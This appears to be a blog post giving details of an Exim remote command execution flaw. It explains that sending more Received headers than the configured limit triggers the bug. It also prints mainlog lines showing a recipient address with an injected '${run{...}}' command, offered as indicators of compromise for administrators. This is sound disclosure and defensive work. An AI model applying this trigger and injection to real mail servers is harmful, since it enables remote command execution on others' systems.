For once, this text is in English.
Before you start reading, please read the article on LWN if you have not already done so. The 24-hour mark described in that article passed a long time ago, and still no further details have been published. As stated there, the vulnerability is trivially exploitable, but discovering it in the actual code is not necessarily so. I believe that, because of its simplicity, an actual exploit is in active use, and that indicators of compromise are unknown to system administrators. This leads to a situation where, after patching your services, you do not know whether your systems have been compromised or not. These are the reasons why I decided to post some further details about this vulnerability.
As far as can be inferred from the published information, to trigger the bug we need the process_recipients variable to hold some value other than RECIP_ACCEPT. That happens earlier in the deliver_message() function, in the following code:
else if (received_count > received_headers_max)
  process_recipients = RECIP_FAIL_LOOP;
So it is only a matter of sending more Received headers than received_headers_max allows. The default limit can be checked on the host:
# exim -bP received_headers_max
received_headers_max = 30
Bringing it all together, a successful attack leaves traces similar to those below, taken from my Exim mainlog (note the recipient local part, logged with non-printable bytes as \xNN escapes, and the bounce message Exim generated for it):
1hbNcz-0001gv-Cm <= adrb@localhost H=localhost [::1] P=esmtp S=1732
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdK-0001l5-89 => adrb R=local_user T=mail_spool
1hbNdK-0001l5-89 Completed
Update: you can read the full details of this vulnerability here.